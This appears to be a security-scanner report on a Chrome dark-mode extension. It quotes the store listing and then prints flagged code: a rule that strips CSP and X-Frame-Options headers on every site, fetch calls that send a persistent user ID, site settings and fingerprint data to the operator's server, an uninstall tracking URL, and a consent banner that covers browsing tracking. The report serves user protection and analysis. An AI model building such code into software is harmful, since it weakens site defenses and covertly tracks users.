Security Alert: Malware Risk Confirmed
Easy Dark Mode
ID: ibbkokjdcfjakihkpihlffljabiepdag
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- weaverstar048View Profile
- Privacy
- Privacy Policy
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
Enable dark mode on any website with one easy click
Easy Dark Mode - Convenience and Eye Protection for Your Workflow. Looking for a simple way to activate Google Doc Dark Mode and reduce eye strain while working? ⭢ Easy Dark Mode is the perfect solution! This handy dark mode extension allows you to easily switch to a darker background in your browser, making it ideal for working in Google Docs and other online tools. ✎ Whether you're writing, editing, or just browsing, switching to dark mode for Chrome provides a more comfortable and relaxing experience. ◐ Why Use Dark Mode Chrome? ✓ Reduce Eye Strain: Prolonged exposure to bright screens can cause discomfort. By using Chrome dark mode, you’ll experience reduced glare, making it easier on your eyes. ✓ Focus Better at Night: Activate night mode for Chrome and enjoy a softer, dark background that’s ideal for low-light environments. It’s perfect for late-night work sessions or reading. ✓ Stay Productive: By making your browsing experience more comfortable, dark mode for Chrome helps you stay focused and productive for longer periods without distractions. How to Turn On Chrome Dark Mode? → Using Easy Dark Mode is simple. Install the extension, and with just one click, you can switch to Google Doc Dark Mode or activate night mode for Chrome in any webpage. No more bright, blinding screens—just smooth, dark backgrounds that enhance your overall user experience. ✿ With Easy Dark Mode, you have the flexibility to quickly toggle between light and dark themes, making it a must-have tool for anyone who spends long hours online. Try it today and experience the benefits of dark mode Chrome firsthand!
The extension uses declarativeNetRequest to strip `content-security-policy`, `content-security-policy-report-only`, and `x-frame-options` response headers from every page the user visits (urlFilter: "*", all frames). Removing CSP disables the primary browser defense against XSS injection on every site, and removing X-Frame-Options enables clickjacking attacks. A dark mode extension has no legitimate reason to remove these security headers globally.
[ { "id": 1, "priority": 1, "action": { "type": "modifyHeaders", "responseHeaders": [ { "header": "content-security-policy-report-only", "operation": "remove" }, { "header": "content-security-policy", "operation": "remove" }, { "header": "x-frame-options", "operation": "remove" } ] }, "condition": { "urlFilter": "*", "resourceTypes": [ "main_frame", "sub_frame" ] } }]On every startup and every 4-hour refresh, the background service worker POSTs the user's persistent UUID (`contextRef`/userId), their full list of per-site custom domain overrides (`customMode`), and consent flag to `https://easy-dark-mode.online/api/themeConfigData`. In return it receives and stores `darkModeFilters` and `suggestColorMode` (recommend) from the remote server. This is both a data exfiltration channel (sending browsing-context data to a third-party server) and a remote configuration channel: the operator can push arbitrary dark mode filter rules and per-domain color-mode recommendations that the extension then applies to all pages.
return e = r.userId, o = r.customDomains, a = void 0 === o ? [] : o, c = r.agreement, u = void 0 !== c && c, (i = new FormData) .append("contextRef", e), i.append("customMode", JSON .stringify(a)), i.append("agreement", u), n.n = 1, fetch( "https://easy-dark-mode.online/api/themeConfigData", { method: "POST", body: i });case 1: if ((s = n.v) .ok) { n.n = 2; break }return n.a(2, "Failed");case 2: return n.n = 3, s.json();case 3: return f = n.v, l = f.recommend, p = f.darkModeFilters, n .n = 4, chrome.storage.local.set({ suggestColorMode: l, darkModeFilters: p }, (function() {}));On install the extension registers an uninstall callback URL that includes the user's persistent UUID (`userId`) in the path. When the extension is removed, Chrome silently hits this URL, notifying the remote server exactly which tracked user uninstalled the extension. This is covert persistent-identifier tracking with no disclosure in the privacy UI shown to the user.
case 0: return n.n = 1, chrome.storage.local.get("userId", (function(n) { var t = n.userId; chrome.runtime.setUninstallURL("https://easy-dark-mode.online/api/uninstall/" + t) }));The GDPR consent banner injected into every page explicitly admits collecting page URLs, referrer headers, timestamps, page titles, and user agent strings. This constitutes comprehensive browsing-history tracking across all websites the user visits. Combined with the persistent userId sent to the server (background.js), this creates a per-user browsing profile. The banner is shown only once (`bannerConsentShown` set immediately before it is shown), and the "Maybe Later" button still sets `agreement: false` in storage which is sent to the server on every subsequent config refresh.
n.innerHTML = '\n <header class="banner-header">\n ...<p class="banner-title">\n Dark Mode - analytics consent\n </p>\n </header>\n <main class="banner-main">\n <p class="banner-text">\n We collect only technical info (like page URLs, referer, timestamps, page title, user agent, random ID) - never personal data.\n </p>\n <p class="banner-text">\n This is safe, private and helps us improve performance, fix issues faster, and build better features.\n </p>\n </main>The report submission function collects and transmits to the remote server: the user's persistent UUID (uId), current page host (pageLocation), full browser user-agent string, install date, OS color-scheme preference, global and per-site dark mode settings, and the user's free-text message. This report bundles more information than necessary for debugging and ties the UUID to detailed browser fingerprint data and browsing context on the remote server.
const r = s.find((e => e.host === o)), l = { eId: chrome.runtime.id, uId: t, pageLocation: o, userAgent: navigator.userAgent, installDate: new Date(a), systemTheme: window.matchMedia("(prefers-color-scheme: dark)") .matches ? "dark" : "light", globalSetting: n ? "on" : "off", customSetting: r ? r.value : "default", dmNotWork: e.target[0].checked, dmBreakeSite: e.target[1].checked, message: e.target[3].value };...await fetch("https://easy-dark-mode.online/api/report", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify(l)})The content script dynamically injects a `<link rel="stylesheet">` tag pointing to `https://fonts.cdnfonts.com/css/helvetica-neue-5` into the DOM of every page where the hint widget is shown. This causes the user's browser to make a request to a third-party CDN carrying the full URL of the visited page as a Referer header, effectively leaking browsing activity to an additional external party beyond the extension's own server.
(e = document.createElement("link")).href = "https://fonts.cdnfonts.com/css/helvetica-neue-5", e.rel = "stylesheet", document.head.appendChild(e),By severity
Versions scanned
Showing 2 of 5 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.3.4 | 6 |
| 1.3.2 | 4 |
Files with findings
5 distinct paths — top paths by unique finding count:
- script/background.js4
- rules.json2
- script/content.js2
- manifest.json1
- popup/popup.js1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.